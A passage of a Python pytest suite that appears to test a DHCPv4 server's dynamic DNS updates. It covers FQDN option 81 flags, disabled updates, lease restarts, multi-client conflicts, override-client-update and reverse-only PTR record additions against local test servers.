    srv_msg.client_requests_option(1)
    srv_msg.client_send_msg('DISCOVER')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')

    misc.test_procedure()
    srv_msg.client_copy_option('server_id')
    srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
    srv_msg.client_requests_option(1)
    srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.exae.com.')
    srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
    srv_msg.client_does_include('Client', 'fqdn')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ACK')
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
    srv_msg.response_check_include_option(81)
    srv_msg.response_check_option_content(81, 'flags', 1)
    srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.exae.com.')

    misc.test_procedure()
    srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)

    misc.test_procedure()
    srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)


@pytest.mark.v4
@pytest.mark.ddns
@pytest.mark.notsig
@pytest.mark.forward_reverse_add
def test_ddns4_notsig_forw_and_rev_notenabled_Sflag():
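    """DDNS updates are disabled ('enable-updates': False); the server echoes the FQDN in option 81 but no DNS records appear despite the client's S flag."""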
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1')
    srv_control.add_ddns_server('127.0.0.1', '53001')
    srv_control.add_ddns_server_options('enable-updates', False)
    srv_control.add_ddns_server_options('generated-prefix', 'four')
    srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
    srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
    srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    srv_control.use_dns_set_number(20)
    srv_control.start_srv('DNS', 'started')

    misc.test_procedure()
    srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)

    misc.test_procedure()
    srv_msg.client_requests_option(1)
    srv_msg.client_send_msg('DISCOVER')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')

    misc.test_procedure()
    srv_msg.client_copy_option('server_id')
    srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
    srv_msg.client_requests_option(1)
    srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.')
    srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
    srv_msg.client_does_include('Client', 'fqdn')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ACK')
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
    srv_msg.response_check_include_option(81)
    # Response option 81 MUST contain flags 10; revisit later so that the 's', 'n' and 'o' bits yield 10.
    srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.')

    misc.test_procedure()
    srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)

    misc.test_procedure()
    srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)


@pytest.mark.v4
@pytest.mark.ddns
@pytest.mark.notsig
@pytest.mark.forward_update
def test_ddns4_notsig_forw_and_rev_update_success_Sflag():
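    """Records are added, then the server is restarted with its lease database cleared; a repeated DISCOVER/REQUEST exchange must leave the existing A and PTR records intact."""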
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1')
    srv_control.add_ddns_server('127.0.0.1', '53001')
    srv_control.add_ddns_server_options('enable-updates', True)
    srv_control.add_ddns_server_options('generated-prefix', 'four')
    srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
    srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
    srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    srv_control.use_dns_set_number(20)
    srv_control.start_srv('DNS', 'started')

    misc.test_procedure()
    srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)

    misc.test_procedure()
    srv_msg.client_requests_option(1)
    srv_msg.client_send_msg('DISCOVER')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')

    misc.test_procedure()
    srv_msg.client_copy_option('server_id')
    srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
    srv_msg.client_requests_option(1)
    srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.')
    srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
    srv_msg.client_does_include('Client', 'fqdn')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ACK')
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
    srv_msg.response_check_include_option(81)
    srv_msg.response_check_option_content(81, 'flags', 1)
    srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.')

    misc.test_procedure()
    srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER')
    srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1')
    srv_msg.dns_option_content('ANSWER', 'rrname', 'aa.four.example.com.')

    misc.test_procedure()
    srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER')
    srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.')
    srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.')

    misc.test_setup()
    srv_control.start_srv('DHCP', 'stopped')
    srv_control.clear_some_data('leases')

    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1')
    srv_control.add_ddns_server('127.0.0.1', '53001')
    srv_control.add_ddns_server_options('enable-updates', True)
    srv_control.add_ddns_server_options('generated-prefix', 'four')
    srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
    srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
    srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')

    misc.test_procedure()
    srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER')
    srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1')
    srv_msg.dns_option_content('ANSWER', 'rrname', 'aa.four.example.com.')

    misc.test_procedure()
    srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER')
    srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.')
    srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.')

    misc.test_procedure()
    srv_msg.client_requests_option(1)
    srv_msg.client_send_msg('DISCOVER')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')

    misc.test_procedure()
    srv_msg.client_copy_option('server_id')
    srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
    srv_msg.client_requests_option(1)
    srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.')
    srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
    srv_msg.client_does_include('Client', 'fqdn')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ACK')
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
    srv_msg.response_check_include_option(81)
    srv_msg.response_check_option_content(81, 'flags', 1)
    srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.')

    misc.test_procedure()
    srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER')
    srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1')
    srv_msg.dns_option_content('ANSWER', 'rrname', 'aa.four.example.com.')

    misc.test_procedure()
    srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER')
    srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.')
    srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.')


@pytest.mark.v4
@pytest.mark.ddns
@pytest.mark.notsig
@pytest.mark.forward_reverse_add
def test_ddns4_notsig_forw_and_rev_two_dhci_Sflag():
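    """Two clients with distinct MAC addresses and FQDNs each obtain a lease and a matching forward (A) record."""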
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1')
    srv_control.add_ddns_server('127.0.0.1', '53001')
    srv_control.add_ddns_server_options('enable-updates', True)
    srv_control.add_ddns_server_options('generated-prefix', 'four')
    srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
    srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
    srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    srv_control.use_dns_set_number(20)
    srv_control.start_srv('DNS', 'started')

    misc.test_procedure()
    srv_msg.dns_question_record('client1.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)

    misc.test_procedure()
    srv_msg.dns_question_record('client2.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)

    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:11')
    srv_msg.client_send_msg('DISCOVER')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')

    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:11')
    srv_msg.client_copy_option('server_id')
    srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
    srv_msg.client_requests_option(1)
    srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'client1.four.example.com.')
    srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
    srv_msg.client_does_include('Client', 'fqdn')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ACK')
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
    srv_msg.response_check_include_option(81)
    srv_msg.response_check_option_content(81, 'flags', 1)
    srv_msg.response_check_option_content(81, 'fqdn', 'client1.four.example.com.')

    misc.test_procedure()
    srv_msg.dns_question_record('client1.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER')
    srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1')
    srv_msg.dns_option_content('ANSWER', 'rrname', 'client1.four.example.com.')

    # Client 2 adds its own records
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:12')
    srv_msg.client_send_msg('DISCOVER')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')

    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:12')
    srv_msg.client_copy_option('server_id')
    srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
    srv_msg.client_requests_option(1)
    srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'client2.four.example.com.')
    srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
    srv_msg.client_does_include('Client', 'fqdn')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ACK')
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
    srv_msg.response_check_include_option(81)
    srv_msg.response_check_option_content(81, 'flags', 1)
    srv_msg.response_check_option_content(81, 'fqdn', 'client2.four.example.com.')

    misc.test_procedure()
    srv_msg.dns_question_record('client2.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER')
    srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1')
    srv_msg.dns_option_content('ANSWER', 'rrname', 'client2.four.example.com.')


@pytest.mark.v4
@pytest.mark.ddns
@pytest.mark.notsig
@pytest.mark.forward_reverse_add
def test_ddns4_notsig_forw_and_rev_dhci_conflicts_Sflag():
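    """Client 2 attempts to claim client 1's FQDN; client 1's A and PTR records must stay unchanged, and client 2's previous records no longer resolve."""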
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1')
    srv_control.add_ddns_server('127.0.0.1', '53001')
    srv_control.add_ddns_server_options('enable-updates', True)
    srv_control.add_ddns_server_options('generated-prefix', 'four')
    srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
    srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
    srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    srv_control.use_dns_set_number(20)
    srv_control.start_srv('DNS', 'started')

    misc.test_procedure()
    srv_msg.dns_question_record('client1.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)

    misc.test_procedure()
    srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)

    misc.test_procedure()
    srv_msg.dns_question_record('client2.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)

    misc.test_procedure()
    srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)

    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:11')
    srv_msg.client_send_msg('DISCOVER')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')

    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:11')
    srv_msg.client_copy_option('server_id')
    srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
    srv_msg.client_requests_option(1)
    srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'client1.four.example.com.')
    srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
    srv_msg.client_does_include('Client', 'fqdn')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ACK')
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
    srv_msg.response_check_include_option(81)
    srv_msg.response_check_option_content(81, 'flags', 1)
    srv_msg.response_check_option_content(81, 'fqdn', 'client1.four.example.com.')

    misc.test_procedure()
    srv_msg.dns_question_record('client1.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER')
    srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1')
    srv_msg.dns_option_content('ANSWER', 'rrname', 'client1.four.example.com.')

    misc.test_procedure()
    srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER')
    srv_msg.dns_option_content('ANSWER', 'rdata', 'client1.four.example.com.')
    srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.')

    # Client 2 adds its own records
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:12')
    srv_msg.client_send_msg('DISCOVER')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')

    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:12')
    srv_msg.client_copy_option('server_id')
    srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
    srv_msg.client_requests_option(1)
    srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'client2.four.example.com.')
    srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
    srv_msg.client_does_include('Client', 'fqdn')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ACK')
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
    srv_msg.response_check_include_option(81)
    srv_msg.response_check_option_content(81, 'flags', 1)
    srv_msg.response_check_option_content(81, 'fqdn', 'client2.four.example.com.')

    misc.test_procedure()
    srv_msg.dns_question_record('client2.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER')
    srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1')
    srv_msg.dns_option_content('ANSWER', 'rrname', 'client2.four.example.com.')

    misc.test_procedure()
    srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER')
    srv_msg.dns_option_content('ANSWER', 'rdata', 'client2.four.example.com.')
    srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.')

    # Client 2 tries to update client 1's domain
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:12')
    srv_msg.client_send_msg('DISCOVER')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')

    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:12')
    srv_msg.client_copy_option('server_id')
    srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
    srv_msg.client_requests_option(1)
    srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'client1.four.example.com.')
    srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
    srv_msg.client_does_include('Client', 'fqdn')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ACK')
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
    srv_msg.response_check_include_option(81)
    srv_msg.response_check_option_content(81, 'flags', 1)
    srv_msg.response_check_option_content(81, 'fqdn', 'client1.four.example.com.')

    # address and domain name should not be changed!
    misc.test_procedure()
    srv_msg.dns_question_record('client1.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER')
    srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1')
    srv_msg.dns_option_content('ANSWER', 'rrname', 'client1.four.example.com.')

    misc.test_procedure()
    srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER')
    srv_msg.dns_option_content('ANSWER', 'rdata', 'client1.four.example.com.')
    srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.')

    misc.test_procedure()
    srv_msg.dns_question_record('client2.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)

    misc.test_procedure()
    srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)


@pytest.mark.v4
@pytest.mark.ddns
@pytest.mark.notsig
@pytest.mark.forward_reverse_add
def test_ddns4_notsig_forw_and_rev_add_success_withoutflag_override_client():
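    """Client sends its FQDN without the S flag, but 'override-client-update' makes the server perform both updates; option 81 returns flags 3."""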
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1')
    srv_control.add_ddns_server('127.0.0.1', '53001')
    srv_control.add_ddns_server_options('override-client-update', True)
    srv_control.add_ddns_server_options('enable-updates', True)
    srv_control.add_ddns_server_options('generated-prefix', 'four')
    srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
    srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
    srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    srv_control.use_dns_set_number(20)
    srv_control.start_srv('DNS', 'started')

    misc.test_procedure()
    srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)

    misc.test_procedure()
    srv_msg.client_requests_option(1)
    srv_msg.client_send_msg('DISCOVER')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')

    misc.test_procedure()
    srv_msg.client_copy_option('server_id')
    srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
    srv_msg.client_requests_option(1)
    srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.')
    srv_msg.client_does_include('Client', 'fqdn')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ACK')
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
    srv_msg.response_check_include_option(81)
    srv_msg.response_check_option_content(81, 'flags', 3)
    srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.')

    misc.test_procedure()
    srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER')
    srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1')
    srv_msg.dns_option_content('ANSWER', 'rrname', 'aa.four.example.com.')

    misc.test_procedure()
    srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER')
    srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.')
    srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.')


@pytest.mark.v4
@pytest.mark.ddns
@pytest.mark.notsig
@pytest.mark.reverse_add
def test_ddns4_notsig_rev_success_withoutflag():
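    """Client sets no FQDN flags, so the server adds only the reverse (PTR) record; no A record is created."""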
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1')
    srv_control.add_ddns_server('127.0.0.1', '53001')
    srv_control.add_ddns_server_options('enable-updates', True)
    srv_control.add_ddns_server_options('generated-prefix', 'four')
    srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
    srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
    srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    srv_control.use_dns_set_number(20)
    srv_control.start_srv('DNS', 'started')

    misc.test_procedure()
    srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)

    misc.test_procedure()
    srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER', expect_include=False)

    misc.test_procedure()
    srv_msg.client_requests_option(1)
    srv_msg.client_send_msg('DISCOVER')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')

    misc.test_procedure()
    srv_msg.client_copy_option('server_id')
    srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1')
    srv_msg.client_requests_option(1)
    srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.')
    srv_msg.client_does_include('Client', 'fqdn')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ACK')
    srv_msg.response_check_content('yiaddr', '127.0.0.1')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_option_content(1, 'value', '127.0.0.1')
    srv_msg.response_check_include_option(81)
    srv_msg.response_check_option_content(81, 'flags', 0)
    srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.')

    misc.test_procedure()
    srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN')
    srv_msg.client_send_dns_query()

    misc.pass_criteria()
    srv_msg.send_wait_for_query('MUST')
    srv_msg.dns_option('ANSWER')
